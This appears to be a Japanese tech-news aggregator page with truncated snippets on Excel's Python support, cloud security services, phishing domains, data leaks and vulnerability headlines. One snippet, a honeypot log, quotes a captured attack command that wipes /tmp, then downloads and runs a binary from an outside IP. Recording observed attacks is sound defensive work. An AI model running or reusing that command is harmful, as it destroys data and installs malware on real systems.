Microsoft、「Python in Excel」を発表 ~Windows向けベータ版でテスト開始【6月18日追記】/Windows版「Excel」のCurrent (Preview)チャネルに順次配信中
一般社団法人のサーバに不正アクセス、迷惑メール送信の踏み台に | ScanNetSecurity
一般社団法人平和政策研究所は8月8日、不正アクセスによる迷惑メールの送信について発表した。 これは同研究所が管理するサーバに外部から不正アクセスがあり、当該サーバ内のメール配信プログラムから8月1日午後11時頃と8月2日午前11時頃の2回にわたり、迷惑メールが配信されたというもの。
人と働く自動運転ロボ、その行動をAIで「最適化」!凸版印刷らが研究開始
■人と協働できるロボットのニーズ少子高齢化などによる労働力不足という問題は深刻化しており、人の業務を代替する自律動作ロボットの活用が進んでいる。特に規模の大きな物流倉庫などでは、自律走行搬送ロボット(AMR:Autonomous Mobile Robot)の導入が進んでいる。 一方、中小規模の物流倉庫ではAMRの導入も進んでいるものの、スペースや費用の問題により、人が介在している場合が多いという。そのため、人とロボットが衝突したり、相互に作業の妨げになって作業効率が落ちたりなどといった課題があり、人と協調・協働できるロボットの開発が期待されている。 また人々の生活においては、自動走行ロボットによる配送・移動式販売や、高齢者向けパーソナルモビリティロボットの活用が検討されている。 ■「マルチエージェントシステム」に着目こういった課題を解決するため、凸版印刷は「マルチエージェントシステム」(M
画像生成AI「Stable Diffusion」に「悪い例を集めたLoRA」を組み合わせて高品質な画像を生成する手法が登場、簡単に試せるデモも公開されたので試してみた
2023年7月に公開された「Stable Diffusion XL 1.0(SDXL 1.0)」は既存のStability AI製モデルと比べて高品質な画像を生成できるだけでなく、LoRAによる生成画像の調整にも対応しています。データサイエンティストのマックス・ウルフ氏は「悪い例」を集めて作成したLoRAを用いてSDXL 1.0による生成画像の品質をさらに向上させる手法を考案し、LoRAファイルおよび誰でも試せるデモを公開しています。 I Made Stable Diffusion XL Smarter by Finetuning it on Bad AI-Generated Images | Max Woolf's Blog https://minimaxir.com/2023/08/stable-diffusion-xl-wrong/ LoRAは参考となる画像を集めて絵柄や服装などを追
クラスメソッド、AWS総合支援サービス「セキュアアカウント」にインシデント自動調査機能を追加
クラスメソッドは、AWS総合支援サービス「セキュアアカウント」の追加機能として、インシデントが発生した場合すぐに日本語の調査結果を受け取れる「インシデント自動調査」の提供を、8月1日に発表した。あわせて、本サービスの1機能である「セキュアアカウント」は、AWSにおけるセキュリティを支援する統合的なブランドにリニューアルする。 AWSのユーザーは、Amazon GuardDutyを活用し、AWS環境上で発生する様々な脅威や不正なコインマイニング、Amazon Simple Storage Service(Amazon S3)からの情報漏洩などを検出することができる。ただし、このような検知を受け取った後にユーザーは、判断・対応のために、実際のAWS環境やログを調査する必要があった。 セキュアアカウントのインシデント自動調査機能 セキュアアカウントの「インシデント自動調査」機能を使用することで、
法人向けセキュリティソフトの料金一括自動計算サイトをオープン
法人向けセキュリティソフトの料金一括自動計算サイトをオープン各社でわかりやすい料金、サービスを表で一括比較。料金概算も台数を入力すると算出 各種クラウドサービスを販売する株式会社アーデント(本社:東京都渋谷区、代表:渡邊賢)は、ビジネスの安全性を向上させるための法人向けセキュリティソフトの料金、サービスが一括で比較できるサイトをオープンしました。 保護するPC・スマートフォンの台数とOSの種類を入れると料金を自動計算。また細かい機能についても表で比較できるようになっています。 株式会社アーデント(本社:東京都渋谷区、代表:渡邊賢)は、ビジネスを守るための法人向けセキュリティソフト5社を一括比較できるサイトc-compe.com(https://c-compe.com/securitysoft/)を公開しました。 「法人向けセキュリティソフト 6社の料金・サービス一括比較サイトc-compe
意味のないセキュリティ対策をやめるために、「アウトカムベースセキュリティ」が有効なワケ
「現代のセキュリティは『新たな脅威や脆弱(ぜいじゃく)性が生まれ、新たなセキュリティソリューションが開発される』の繰り返しです。企業が受け身になって脅威や脆弱性が出るたびに新たなソリューションを買い足していたらキリがなく、現場は混乱するでしょう。企業は『自社に本当に必要なものは何か』をはっきりさせる必要があります。多くの企業がセキュリティ対策で『なぜ』を忘れている現状に対するリマインダーとして考えたのがアウトカムベースセキュリティです」(ベヘラスコ氏) アウトカムはビジネスで達成したい“成果”であり、セキュリティはあくまでその達成をサポートするものだ。決して「セキュリティのためのセキュリティではない」とベヘラスコ氏は念を押す。 セキュリティ対策に投資する中で、有用だったセキュリティソリューションも時代の変化に伴って不十分になったり、他のソリューションや運用でカバーできるようになったりするケ
クラウドセキュリティの継続運用・自動化をサポートするセキュリティSaaS「Shisho Cloud」正式版を提供開始
プロダクト開発組織に向けたサイバーセキュリティ関連事業を展開する株式会社Flatt Security(代表取締役社長:井手康貴 以下、Flatt Security)は、本日2023年8月23日(水)より、クラウドセキュリティの継続運用・自動化をサポートするセキュリティSaaS「Shisho Cloud」(シショウクラウド、URL:https://shisho.dev/ja)正式版の提供を開始します。 「Shisho Cloud」正式版は、2022年の事前登録開始時からコンセプトを一新し、AWS・Google Cloudのセキュリティ診断の自動化や、クラウドセキュリティの継続運用のサポートに特化した機能を備えています。活用いただくことで、クラウドセキュリティ運用体制の構築や負担軽減、運用フローのさらなる効率化を実現することが可能です。 また、新たなセキュリティトレンドであるPolicy as
Excelが「Python」に対応 シート上でコードを実行できるように グラフ作成、機械学習なども可能
米Microsoftは8月22日、Excelにプログラミング言語「Python」を搭載すると発表した。セルに「PY関数(=PY)」を入力するとPythonのコードを記述できるようになる。Pythonのライブラリとシート上のデータを参照して高度なグラフ作成や機械学習などができるという。 機能の名前は「Python in Excel」。利用には試験的に実装された機能を体験できるプログラム「Microsoft 365 Insider Program」への参加が必要。 Pythonコードは、クラウドプラットフォーム「Microsoft Cloud」上で実行。Pythonの各種ライブラリをまとめた「Anaconda」を活用しており、グラフ作成ライブラリを使ったデータの視覚化や、機械学習ライブラリを使った機械学習や予測分析などもできる。
本物そっくりなドメインとその見分け方
フィッシングや標的型攻撃には、偽のウェブサイトやメールアドレスがよく使われます。偽ドメインはどのように作られていて、私たちはどのように見分ければよいのでしょうか。 職場でアカウントのパスワード変更を求めるIT部からのメールや、人事から有給休暇の日程確認のメールなど、誰でも受信したことがあるでしょう。ただし、このようなメールが予期せぬタイミングで届いたら、慎重に行動する必要があります。会社に対するサイバー攻撃の始まりである可能性があります。詐欺でないことをしっかり確認するために、何をどうチェックすべきなのでしょうか。 最も注意を払う点はドメイン名です。つまり、電子メールの@の後、URLの先頭部分に注目します。犯罪者はドメインに、被害者に疑われないような文字や数字などを使用しています。サイバー犯罪者は、狙った企業の公式ドメインやその取引関係のあるサプライヤー、ビジネスパートナーのドメインをハイ
IBMがAIを活用してCOBOL言語をJavaに変換するツール「Watsonx Code Assistant for Z」をリリースすることを発表
1959年に開発されたプログラミング言語「COBOL」は、自然言語に近いコマンド構文が採用されていることから、金額計算などの事務処理用に広く使われてきました。一方でCOBOLは「非効率的な言語」と指摘されることがあります。2023年8月22日にIBMが発表した「Watsonx Code Assistant for Z」では、コード生成AIモデルを使用してCOBOL言語で書かれたコードをJavaに変換することが可能です。 IBM Unveils watsonx Generative AI Capabilities to Accelerate Mainframe Application Modernization https://newsroom.ibm.com/2023-08-22-IBM-Unveils-watsonx-Generative-AI-Capabilities-to-Accel
Apple WatchにTouch ID搭載を計画か〜文字盤色変更機能と共に特許取得 - iPhone Mania
Appleが、Apple Watchの画面下にカラーサンプリングセンサーを搭載しTouch IDに対応、同じセンサーを使ってユーザーが身につけている衣服の色にあわせて文字盤やバンドの色を自動で変化させる機能に関する特許を取得したことが確認されました。 ■3行で分かる、この記事のポイント 1. Appleが、Apple Watchの画面下にカラーサンプリングセンサーを搭載する特許を取得した。 2. センサーは、指紋の読み取りにも活用できる。 3. 2024年発売と噂の、Apple Watch Xへの実装が期待される。 センサーを用いて指紋や色を判別 Appleが現地時間2023年8月22日に米国特許商標庁(USPTO)で取得した特許は、「カラーサンプリングセンサーを備えた電子機器」と題されたものです。 特許では、Apple Watchの画面下にカラーサンプリングセンサーを搭載し、対象物のカラ
パートが資料を持ち帰って裏紙に→実は個人情報 明海大学で漏えいの可能性
明海大学は8月23日、学生の個人情報が書かれた書類を遺失したと発表した。元パートタイマーの職員が個人情報を含む書類を無断で持ち帰り、“裏紙”として私的に利用。一部は保管していたが、それ以外は廃棄したり、飲食店で紛失していたりしたという。紛失した書類に含まれていた情報の一部は漏えいの可能性がある。 元パートタイマーが持ち帰った書類は、2011年当時に在籍してた学生20人の氏名、学部、学科、学生番号などが含まれる資料など100枚程度。 事態は18日に発覚した。元パートタイマーが紛失した書類を第三者が拾い、そのまま明海大学に郵送したことで明らかになったという。同学は漏えいした可能性がある情報の悪用は確認していないとしている。今後は情報管理を再徹底し、再発防止を目指すという。 関連記事 日本郵便、約21万人分の顧客情報を紛失 “紙多すぎ”で扱いきれず 日本郵便が、郵便局で取り扱った投資信託取引と国
SNSで募集、個人情報を送らせて脅迫→捨て駒に 「闇バイト」勧誘の手口、警察庁が公開
警察庁は、社会問題化している「闇バイト」の傾向をまとめた事例集を公開した。犯行グループはSNSやコミュニティサイトで少年たちを集め、言葉巧みに個人情報を引き出し、それを元に脅迫していた。最後には“必ず”警察に検挙されるという。 少年たちが闇バイトで犯罪に加担するまでの流れにはいくつかのパターンが存在するが、多いのはX(旧Twitter)やInstagramなどのSNSを通じて自ら応募するケースだ。例えば「お金に困っている」とXで投稿したら「働いてみないか」というメッセージが届き、送り主が犯行グループだったという。 応募の意思を示すと、犯行グループは匿名性の高いメッセージアプリをスマートフォンに導入するように指示する。メッセージの自動削除を設定できる「Signal」や「Telegram」、中国で人気の高い「WeChat」「DingTalk」などのアプリが使われる。 さらに犯行グループは「アル
芸能人がSNSに投稿した感想、企業はどこまで使ってOK? 一般人の「ノリ」では危ない、SNSの著作権の線引き
仕事の現場で直面しやすい「著作権」に関する悩みや疑問に答えた、『職場の著作権対応100の法則』の出版記念イベントの模様をお届けします。普段はあまり気にしていないものの、いざ直面して悩む「著作権」。本イベントでは著者の友利昴氏が登壇し、出版に至るまでの背景や、「SNSでありがちな著作権問題」「どこまで許可を取るか問題」「AIの生成物をどう扱うか」など、職場で起きうる著作権に関する疑問について解説しました。本記事では、SNSに関する権利について解説されました。 職場の「著作権あるある」問題を解決 早瀬隆春氏(以下、早瀬):それでは始めていきたいと思います。みなさん、こんにちは。日本能率協会マネジメントセンターの早瀬と申します。司会進行を務めますので、よろしくお願いいたします。 本日は『職場の著作権対応100の法則』出版記念イベント、「仕事の『著作権あるある』問題を解決しよう」にご参加いただきま
機械学習と深層学習違いとは?AIと密接に関連する仕組みを解説 | Koto Online
ニュースなどを見ていると、「AIによって〇〇を解析」「AI搭載の〇〇」など毎日のようにAIという言葉が目や耳に入ってきており、特にChatGPTの登場によりその頻度は急速に上がってきています。今や私たちの生活に欠かせない存在となったAI(Artificial Intelligence/人工知能)ですが、「AIがどういった技術なのか深く理解できていない」「AIの進化が自分たちの生活や仕事にどう影響するのか分からない」という方もいらっしゃるのではないでしょうか。 本コラムでは、AIとはそもそも何なのか、そして機械学習や深層学習がどういった仕組みなのか、を改めて解説いたします。 AIの定義とは? 「AIとは何か?AIの定義は?」という議論はこれまで活発に行われてきました。ここでは、最もイメージしやすいであろう定義をご紹介します。 “AIとは人工的に作られた人間のような知能、ないしはそれを作る技術
2023/08/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/08/17分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP Spring Bootの脆弱性を狙うアクセス .jsへのスキャン行為 /.awsへのスキャン行為 /.gitへのスキャン行為 を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 192.210.162.147/arm; chmod 777 /tmp/arm; sh /tmp/arm4 Location:US Spring Bootの脆弱性を狙うアクセス Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス /.gitへのスキャン行為 Gh0stRAT
SBテクノロジー、クラウドのセキュリティリスクを検出・通知する「クラウドパトロール」を提供 | IT Leaders
IT Leaders トップ > テクノロジー一覧 > セキュリティ > 新製品・サービス > SBテクノロジー、クラウドのセキュリティリスクを検出・通知する「クラウドパトロール」を提供 セキュリティ セキュリティ記事一覧へ [新製品・サービス] SBテクノロジー、クラウドのセキュリティリスクを検出・通知する「クラウドパトロール」を提供 Microsoft Defender for Cloudを利用 2023年8月21日(月)日川 佳三(IT Leaders編集部) リスト SBテクノロジーは2023年8月21日、クラウド監視サービス「クラウドパトロール」を提供開始した。AWS/Azure/Google Cloudなど主要なパブリッククラウド環境を対象に、不正アクセスや情報漏洩につながるリスクを発見・通知する。60分ごとにクラウド環境を監視し、インシデント発生につながる設定上の不備やインシ
個人情報保護委「生成AI利用に注意」 事業者・行政機関向けにポイント解説
個人情報保護委員会は8月21日、生成AIサービスの利用に関する注意点をまとめたパンフレットを公開した。事業者や行政機関などに向けて、各提供サービスの利用者が入力した情報を、AIの学習データとして利用する予定がある場合に注意すべきことなどを記載している。 内容は、「個人データを第三者に提供する場合は本人の同意を得る必要がある」「保有個人情報を利用・提供する場合は特定された目的のためでなければならない」などの規律が存在することを知らせるもの。 サービス組み込み用の生成AIを提供する事業者などは、利用者が入力した情報を学習に使う場合もある。サービスの実装方法や規約によってはこれが個人情報保護法に触れる可能性があるため、確認するよう注意喚起したものとみられる。 個人情報保護委員会は以前にも「生成AIサービスの利用に関する注意喚起等」という文書を公開。生成AIサービスの利用に当たっては、情報の取り扱
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
WordPress 用プラグイン Advanced Custom Fields にXSSの脆弱性 | ScanNetSecurity
複数のTP-Link製品に複数の脆弱性 | ScanNetSecurity
【セキュリティ ニュース】モバイル端末向けVPN製品「Ivanti Sentry」に深刻な脆弱性(1ページ目 / 全1ページ):Security NEXT
【セキュリティ ニュース】IvantiのVPN製品やVeeamバックアップ製品に対する脆弱性攻撃が発生(1ページ目 / 全1ページ):Security NEXT
IoT-EX、クラウド型MDMサービス「BizMobile Go! Direct」にて文教向けサービスパックの提供を開始
JVN#55217369: Rakuten WiFi Pocket における認証不備の脆弱性
NVIDIAとVMware、企業向け生成AIプラットフォーム提供
多くのセキュリティツールをすり抜ける新攻撃手法「MalDoc in PDF」 ~JPCERT/CCが警告/7月に発生したセキュリティ攻撃で実際に用いられる
【セキュリティ ニュース】ランサム攻撃でデータ暗号化、個人情報が流出した可能性も - 上條器械店(1ページ目 / 全1ページ):Security NEXT
トレンドマイクロ、統合セキュリティ基盤「Trend Vision One」に自社セキュリティ製品の管理・運用機能を搭載
Androidの性能とセキュリティが向上する「ART 14」がまもなく配信
VMwareが新ソリューションを発表、キーワードは“マルチクラウド”と“生成AI”
セキュリティソフト「ESET」シリーズにローカル特権昇格の脆弱性 ~修正パッチが公開/「HIPSサポート機能」モジュールが「1463」以降になっていることを確認
NTTデータ先端技術と日本IBM、統合ID管理とクラウド認証を組み合わせたソリューションを提供
100億パラメーターのバイリンガル大規模言語モデル「Weblab-10B」公開、東大松尾研究室が公開 
【セキュリティ ニュース】アクセスポイント構築ソフト「RaspAP」に脆弱性(1ページ目 / 全1ページ):Security NEXT